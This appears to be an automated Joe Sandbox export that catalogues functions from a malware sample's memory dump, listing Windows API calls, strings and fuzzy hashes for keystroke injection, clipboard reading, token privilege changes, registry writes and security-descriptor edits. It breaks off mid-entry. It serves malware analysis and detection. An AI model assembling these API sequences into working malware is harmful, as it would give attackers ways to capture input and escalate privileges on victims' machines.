Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3b73ceb0b3cab216ce17a71721b47611c0dc64bb45f922bc7579b7ef5ff65db6
Instruction ID: d0b86956dfe8935090aef2b78e665243a4d8116919fa246948bc35e0a7f7ffee
Opcode Fuzzy Hash: 3b73ceb0b3cab216ce17a71721b47611c0dc64bb45f922bc7579b7ef5ff65db6
Instruction Fuzzy Hash: 10110035E4020CEBEB64DBA8C959BEDB775AF44702F308195E605A72C0CB755E80DF50

Function 01912300 Relevance: 1.3, APIs: 1, Instructions: 34sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 01912312

Memory Dump Source

Source File: 00000000.00000002.2042131786.0000000001910000.00000040.00001000.00020000.00000000.sdmp, Offset: 01910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1910000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: dce1e67ee7a905aee1ad479c7a3e30644d0bd5a7b1fbfaf3e5e7a496efc26c57
Instruction ID: 07ea9a3ec5dc29a22d8a66a67aee4c3acdfed3527977b83d7f17cbf5b3f3851f
Opcode Fuzzy Hash: dce1e67ee7a905aee1ad479c7a3e30644d0bd5a7b1fbfaf3e5e7a496efc26c57
Instruction Fuzzy Hash: 13F0C93194010EAFCF05EFA4D9499EEBB74FF04711F604555FA1AA2184DB30AA52CB61

Non-executed Functions

Function 00EACDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00E22612: GetWindowLongW.USER32(?,000000EB), ref: 00E22623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00EACE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EACE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 00EACED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EACF00
SendMessageW.USER32 ref: 00EACF29
_wcsncpy.LIBCMT ref: 00EACFA1
GetKeyState.USER32(00000011), ref: 00EACFC2
GetKeyState.USER32(00000009), ref: 00EACFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00EACFE5
GetKeyState.USER32(00000010), ref: 00EACFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00EAD018
SendMessageW.USER32 ref: 00EAD03F
SendMessageW.USER32(?,00001030,?,00EAB602), ref: 00EAD145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 00EAD15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00EAD16E
SetCapture.USER32(?), ref: 00EAD177
ClientToScreen.USER32(?,?), ref: 00EAD1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 00EAD1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00EAD203
ReleaseCapture.USER32 ref: 00EAD20E
GetCursorPos.USER32(?), ref: 00EAD248
ScreenToClient.USER32(?,?), ref: 00EAD255
SendMessageW.USER32(?,00001012,00000000,?), ref: 00EAD2B1
SendMessageW.USER32 ref: 00EAD2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 00EAD31C
SendMessageW.USER32 ref: 00EAD34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00EAD36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 00EAD37B
GetCursorPos.USER32(?), ref: 00EAD39B
ScreenToClient.USER32(?,?), ref: 00EAD3A8
GetParent.USER32(?), ref: 00EAD3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 00EAD431
SendMessageW.USER32 ref: 00EAD462
ClientToScreen.USER32(?,?), ref: 00EAD4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00EAD4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 00EAD51A
SendMessageW.USER32 ref: 00EAD53D
ClientToScreen.USER32(?,?), ref: 00EAD58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00EAD5C3

Part of subcall function 00E225DB: GetWindowLongW.USER32(?,000000EB), ref: 00E225EC

GetWindowLongW.USER32(?,000000F0), ref: 00EAD65F

Strings

@GUI_DRAGID, xrefs: 00EAD1AA
pr, xrefs: 00EAD1BD
F, xrefs: 00EAD543

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$pr
API String ID: 3977979337-1436871235
Opcode ID: eba1cb49f75e8eea1619e00af8bea4e0d8e758eced928e243a58fd9598249dfa
Instruction ID: 679030e22b26ebb1dfb9f25e0cdbf4894108cade55508bbb71dcee34af7c03f8
Opcode Fuzzy Hash: eba1cb49f75e8eea1619e00af8bea4e0d8e758eced928e243a58fd9598249dfa
Instruction Fuzzy Hash: 7142B234604241EFD725CF68C884FAABBE5FF4E318F14551DF696AB2A0C731A854CB92

Function 00EA804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00EA873F

Strings

%d/%02d/%02d, xrefs: 00EA8478

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: 94c49726c7dec2fbad5238cb0a3b59e72660d062c3dec953675a0e24830e4736
Instruction ID: cf2885854539c9ab6d270e3b100c9177ee06f26066313cb4d355d475573be0fc
Opcode Fuzzy Hash: 94c49726c7dec2fbad5238cb0a3b59e72660d062c3dec953675a0e24830e4736
Instruction Fuzzy Hash: 5D12DF70500204AFEB248F65DD49FAA7BF4EF8E314F24612AF915FE2A1DB70A945CB50

Function 00E3710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00E375C2
_memset.LIBCMT ref: 00E376B1
_memmove.LIBCMT ref: 00E37C4B
_memmove.LIBCMT ref: 00E37E4F

Strings

0w, xrefs: 00E71F5B
Q\E, xrefs: 00E381C1
DEFINE, xrefs: 00E725AF
[:>:]], xrefs: 00E3760A
[:<:]], xrefs: 00E375F1
\b(?<=\w), xrefs: 00E73C41
Oa, xrefs: 00E7287E
\b(?=\w), xrefs: 00E73C34

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: _memmove$_memset
String ID: 0w$DEFINE$Oa$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-332139107
Opcode ID: 87b13db7dba2bd31ff1f5b6bf2d5b675b538814777a5a54204b1aa96669df530
Instruction ID: 14b0312a0272d489d85492b7b0faf8bede699c53d53bf0b68c926d4782d0c4ac
Opcode Fuzzy Hash: 87b13db7dba2bd31ff1f5b6bf2d5b675b538814777a5a54204b1aa96669df530
Instruction Fuzzy Hash: 72939171A00215DFDB24CFA8C885BEDB7B1FF48314F25916AE959BB290E7709E81DB40

Function 00E24A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00E24A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E5DA8E
IsIconic.USER32(?), ref: 00E5DA97
ShowWindow.USER32(?,00000009), ref: 00E5DAA4
SetForegroundWindow.USER32(?), ref: 00E5DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00E5DAC4
GetCurrentThreadId.KERNEL32 ref: 00E5DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 00E5DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 00E5DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 00E5DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 00E5DAF8
SetForegroundWindow.USER32(?), ref: 00E5DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E5DB10
keybd_event.USER32(00000012,00000000), ref: 00E5DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E5DB25
keybd_event.USER32(00000012,00000000), ref: 00E5DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E5DB33
keybd_event.USER32(00000012,00000000), ref: 00E5DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 00E5DB42
keybd_event.USER32(00000012,00000000), ref: 00E5DB47
SetForegroundWindow.USER32(?), ref: 00E5DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 00E5DB71

Strings

Shell_TrayWnd, xrefs: 00E5DA89

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: 42bf5b2d02f1fa52ebe5b4c7ec28ba9a020b71ff98a244b856fcdc272c00337f
Instruction ID: b97f994cfa9c27ac9061d3aae785e546d2b8902be595bd137e269a51fe83393a
Opcode Fuzzy Hash: 42bf5b2d02f1fa52ebe5b4c7ec28ba9a020b71ff98a244b856fcdc272c00337f
Instruction Fuzzy Hash: E9316271A40318BEEB306FA29C49F7F3E6CEB49B51F114065FA04FA1D1D6B06D14AAA0

Function 00E78858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00E78CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E78D0D
Part of subcall function 00E78CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E78D3A
Part of subcall function 00E78CC3: GetLastError.KERNEL32 ref: 00E78D47

_memset.LIBCMT ref: 00E7889B
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 00E788ED
CloseHandle.KERNEL32(?), ref: 00E788FE
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00E78915
GetProcessWindowStation.USER32 ref: 00E7892E
SetProcessWindowStation.USER32(00000000), ref: 00E78938
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00E78952

Part of subcall function 00E78713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00E78851), ref: 00E78728
Part of subcall function 00E78713: CloseHandle.KERNEL32(?,?,00E78851), ref: 00E7873A

Strings

default, xrefs: 00E7894D
winsta0, xrefs: 00E78910
, xrefs: 00E788AA

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
String ID: $default$winsta0
API String ID: 2063423040-1027155976
Opcode ID: f1ccb158865ea594f152e749a896ae4c2c81690357073dfb704597b2d70c33c8
Instruction ID: 88a3ec932c7ba0cb5c65aa210ecfe6840998407ee9230721388785f3cabb49b1
Opcode Fuzzy Hash: f1ccb158865ea594f152e749a896ae4c2c81690357073dfb704597b2d70c33c8
Instruction Fuzzy Hash: 5D816171940209BFDF11DFA4DD49AEE7BB8EF18308F08916AF914B6161DB319E14DB60

Function 00E9425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00EAF910), ref: 00E94284
IsClipboardFormatAvailable.USER32(0000000D), ref: 00E94292
GetClipboardData.USER32(0000000D), ref: 00E9429A
CloseClipboard.USER32 ref: 00E942A6
GlobalLock.KERNEL32(00000000), ref: 00E942C2
CloseClipboard.USER32 ref: 00E942CC
GlobalUnlock.KERNEL32(00000000,00000000), ref: 00E942E1
IsClipboardFormatAvailable.USER32(00000001), ref: 00E942EE
GetClipboardData.USER32(00000001), ref: 00E942F6
GlobalLock.KERNEL32(00000000), ref: 00E94303
GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00E94337
CloseClipboard.USER32 ref: 00E94447

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 3b726142e1622347754f152bba7e6f800036b027694ac1c97550de7be49942cb
Instruction ID: 1102fffd3b6f7fe77fd3b167aa124517227f8d292b1f5f4e67365ef9a539ddc5
Opcode Fuzzy Hash: 3b726142e1622347754f152bba7e6f800036b027694ac1c97550de7be49942cb
Instruction Fuzzy Hash: 6151A071204305AFDB10EFA1EC96F6E77E8AF89B04F005529F595F21E1DB70E9098B62

Function 00E8C9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00E8C9F8
FindClose.KERNEL32(00000000), ref: 00E8CA4C
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E8CA71
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00E8CA88
FileTimeToSystemTime.KERNEL32(?,?), ref: 00E8CAAF
__swprintf.LIBCMT ref: 00E8CAFB
__swprintf.LIBCMT ref: 00E8CB3E

Part of subcall function 00E27F41: _memmove.LIBCMT ref: 00E27F82

__swprintf.LIBCMT ref: 00E8CB92

Part of subcall function 00E438D8: __woutput_l.LIBCMT ref: 00E43931

__swprintf.LIBCMT ref: 00E8CBE0

Part of subcall function 00E438D8: __flsbuf.LIBCMT ref: 00E43953
Part of subcall function 00E438D8: __flsbuf.LIBCMT ref: 00E4396B

__swprintf.LIBCMT ref: 00E8CC2F
__swprintf.LIBCMT ref: 00E8CC7E
__swprintf.LIBCMT ref: 00E8CCCD

Strings

%02d, xrefs: 00E8CB86, 00E8CB90, 00E8CBDE, 00E8CC2D, 00E8CC7C, 00E8CCCB
%4d%02d%02d%02d%02d%02d, xrefs: 00E8CAF5
%4d, xrefs: 00E8CB38

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: 962a9892d0ef82b67465da06145e455e3ba5715f399efb40eda607b1388959dc
Instruction ID: be6385c0e022e024abe1097b3d7118f7b021ea2efe8f24fd47974bcd31b4352d
Opcode Fuzzy Hash: 962a9892d0ef82b67465da06145e455e3ba5715f399efb40eda607b1388959dc
Instruction Fuzzy Hash: A1A152B1508314ABC714FB60D986DAFB7ECFF98700F402919F585E6192EB34DA08C762

Function 00E8F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E8F221
_wcscmp.LIBCMT ref: 00E8F236
_wcscmp.LIBCMT ref: 00E8F24D
GetFileAttributesW.KERNEL32(?), ref: 00E8F25F
SetFileAttributesW.KERNEL32(?,?), ref: 00E8F279
FindNextFileW.KERNEL32(00000000,?), ref: 00E8F291
FindClose.KERNEL32(00000000), ref: 00E8F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 00E8F2B8
_wcscmp.LIBCMT ref: 00E8F2DF
_wcscmp.LIBCMT ref: 00E8F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 00E8F308
SetCurrentDirectoryW.KERNEL32(00EDA5A0), ref: 00E8F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E8F330
FindClose.KERNEL32(00000000), ref: 00E8F33D
FindClose.KERNEL32(00000000), ref: 00E8F34F

Strings

*.*, xrefs: 00E8F2B3

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: dec530abb0b858ee9428836c2d9263f1c2d137dfbe7eb32f44e0ea372fc4b3fb
Instruction ID: 187fd32c7f96cbf211bc9ea7fcb5c7e4a36c45cfd06741b8b0038475d18bbf12
Opcode Fuzzy Hash: dec530abb0b858ee9428836c2d9263f1c2d137dfbe7eb32f44e0ea372fc4b3fb
Instruction Fuzzy Hash: EF31B2765002196EDF10EBB4EC58ADE77ECAF09365F141176E848F30A0EB30EA498B64

Function 00EA0AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EA0BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,00EAF910,00000000,?,00000000,?,?), ref: 00EA0C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00EA0C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00EA0D1D
RegCloseKey.ADVAPI32(?), ref: 00EA103D
RegCloseKey.ADVAPI32(00000000), ref: 00EA104A

Strings

REG_MULTI_SZ, xrefs: 00EA0E05
REG_SZ, xrefs: 00EA0D5B
REG_QWORD, xrefs: 00EA0F8B
REG_DWORD, xrefs: 00EA0F0E
REG_BINARY, xrefs: 00EA0FD8
REG_EXPAND_SZ, xrefs: 00EA0CBA

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: bb8df72baf57afa8dcd3a0e4f9d8212be9f5716727e8989343fca9a01d7effa4
Instruction ID: 8bd511d693b41acbbf1ec94080189aa6cc946488017f7f4630208c0b248f92fe
Opcode Fuzzy Hash: bb8df72baf57afa8dcd3a0e4f9d8212be9f5716727e8989343fca9a01d7effa4
Instruction Fuzzy Hash: 48025B756006119FDB14EF24D881A2AB7E5FF89724F04A85DF889AB362CB31FD41CB81

Function 00E8F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00E8F37E
_wcscmp.LIBCMT ref: 00E8F393
_wcscmp.LIBCMT ref: 00E8F3AA

Part of subcall function 00E845C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00E845DC

FindNextFileW.KERNEL32(00000000,?), ref: 00E8F3D9
FindClose.KERNEL32(00000000), ref: 00E8F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 00E8F400
_wcscmp.LIBCMT ref: 00E8F427
_wcscmp.LIBCMT ref: 00E8F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 00E8F450
SetCurrentDirectoryW.KERNEL32(00EDA5A0), ref: 00E8F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 00E8F478
FindClose.KERNEL32(00000000), ref: 00E8F485
FindClose.KERNEL32(00000000), ref: 00E8F497

Strings

*.*, xrefs: 00E8F3FB

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 2fdabb9c78793cd4ab1764ddea40f37b384b8c0a9bb7eec422449ebdca6a1c8b
Instruction ID: fa93555b290b10187aa8bddee60b127ca231b3222ec6ec97e06e7afd35e4976d
Opcode Fuzzy Hash: 2fdabb9c78793cd4ab1764ddea40f37b384b8c0a9bb7eec422449ebdca6a1c8b
Instruction Fuzzy Hash: DC31A2715012196ECB10ABA4EC98ADF77AC9F49364F141276E858B21A0DB30EA49CB64

Function 00E781F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E7874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E78766
Part of subcall function 00E7874A: GetLastError.KERNEL32(?,00E7822A,?,?,?), ref: 00E78770
Part of subcall function 00E7874A: GetProcessHeap.KERNEL32(00000008,?,?,00E7822A,?,?,?), ref: 00E7877F
Part of subcall function 00E7874A: HeapAlloc.KERNEL32(00000000,?,00E7822A,?,?,?), ref: 00E78786
Part of subcall function 00E7874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E7879D

Part of subcall function 00E787E7: GetProcessHeap.KERNEL32(00000008,00E78240,00000000,00000000,?,00E78240,?), ref: 00E787F3
Part of subcall function 00E787E7: HeapAlloc.KERNEL32(00000000,?,00E78240,?), ref: 00E787FA
Part of subcall function 00E787E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E78240,?), ref: 00E7880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E7825B
_memset.LIBCMT ref: 00E78270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E7828F
GetLengthSid.ADVAPI32(?), ref: 00E782A0
GetAce.ADVAPI32(?,00000000,?), ref: 00E782DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E782F9
GetLengthSid.ADVAPI32(?), ref: 00E78316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E78325
HeapAlloc.KERNEL32(00000000), ref: 00E7832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E7834D
CopySid.ADVAPI32(00000000), ref: 00E78354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E78385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E783AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E783BF

Memory Dump Source

Source File: 00000000.00000002.2041939352.0000000000E21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true

Associated: 00000000.00000002.2041919954.0000000000E20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000EAF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2041989204.0000000000ED5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042029255.0000000000EDF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2042045927.0000000000EE8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e20000_LisectAVT_2403002B_466.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
